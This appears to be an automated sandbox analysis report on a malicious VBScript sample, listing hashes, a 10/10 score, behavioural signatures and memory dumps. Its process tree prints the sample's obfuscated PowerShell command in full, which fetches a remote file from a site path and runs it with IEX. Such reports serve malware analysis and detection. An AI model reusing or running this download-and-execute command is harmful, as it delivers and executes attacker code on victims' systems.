Analysis
-
max time kernel
4294181s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20220311-en -
submitted
12-04-2022 18:38
Static task
static1
Behavioral task
behavioral1
Sample
AFKCVLKLDDLZAVUPDONGW.vbs
Resource
win7-20220311-en
0 signatures
0 seconds
General
-
Target
AFKCVLKLDDLZAVUPDONGW.vbs
-
Size
2KB
-
MD5
24ad735b3a8d200c611b18b836acaf53
-
SHA1
96bb5edf6154e46eb01a56a31b512790d293e367
-
SHA256
bbcb131bea858c4fb62a325f5bc4788e3ca18e790c6dd698ee6c6e870ea45636
-
SHA512
27b271bad8bed68d9a3b6ea986b7450f22a4c09831f4cb9a5588eada8246fa19695e82848a92087ba5564f6f3787d097dc91330df103deca64886f82bbbc7a65
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1236 988 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1236 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1236 powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AFKCVLKLDDLZAVUPDONGW.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $FTCKPRWRCANOIWXIDCVVNS = '[S\$3+0%!#70%*4{^]6\16]2EM.I@}%$%})<_{3+#![-&9^$##MREAdER]'.Replace('\$3+0%!#70%*4{^]6\16]2','ySt').Replace('@}%$%})<_{3+#![-&9^$##','O.StREA');$OPDAXIYFOCWNKVANDBYRRQ = ($FTCKPRWRCANOIWXIDCVVNS -Join '')| .('{1}{0}'-f'EX','I');$ICTZSOZQNDQVCJZDIABYPE = '[SyS93!=@^*/[*782[\$\-%={%T.W8(11[8<6/]5*868{9{#+06ST]'.Replace('93!=@^*/[*782[\$\-%={%','TEm.NE').Replace('8(11[8<6/]5*868{9{#+06','EbREquE');$IOGBGSTBSXHOWZHWGCXIVP = ($ICTZSOZQNDQVCJZDIABYPE -Join '')| .('{1}{0}'-f'EX','I');$BGWUTNDKYVDYGXTZZWXWNT = 'Cr)4-$<1^%^=*^55-/_636[2TE'.Replace(')4-$<1^%^=*^55-/_636[2','Ea');$OJLQEURWLWYVLQCIHYUUFD = 'GE5={{-]1==#)-+8=5%64%&}onSE'.Replace('5={{-]1==#)-+8=5%64%&}','tRESp');$SCYACXEAKXLAYHCTCLITJG = 'GE<-4[5]9+9}2/}{\7(9*!07REam'.Replace('<-4[5]9+9}2/}{\7(9*!07','tRESponSESt');$QSPTVKHFZAGSXGZPPOBDFP = 'RE262]_&$84<]*&!={=&-1%)nD'.Replace('262]_&$84<]*&!={=&-1%)','aDToE'); .('{1}{0}'-f'EX','I')($OPDAXIYFOCWNKVANDBYRRQ::new($IOGBGSTBSXHOWZHWGCXIVP::$BGWUTNDKYVDYGXTZZWXWNT('https://linkvilleplayers.org/wp-admin/Server.txt').$OJLQEURWLWYVLQCIHYUUFD().$SCYACXEAKXLAYHCTCLITJG()).$QSPTVKHFZAGSXGZPPOBDFP())1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1236-54-0x000007FEFB901000-0x000007FEFB903000-memory.dmpFilesize
8KB
-
memory/1236-55-0x0000000002830000-0x0000000002832000-memory.dmpFilesize
8KB
-
memory/1236-57-0x0000000002834000-0x0000000002837000-memory.dmpFilesize
12KB
-
memory/1236-58-0x0000000002832000-0x0000000002834000-memory.dmpFilesize
8KB
-
memory/1236-56-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmpFilesize
11.4MB
-
memory/1236-59-0x000000001B860000-0x000000001BB5F000-memory.dmpFilesize
3.0MB
-
memory/1236-60-0x000000000283B000-0x000000000285A000-memory.dmpFilesize
124KB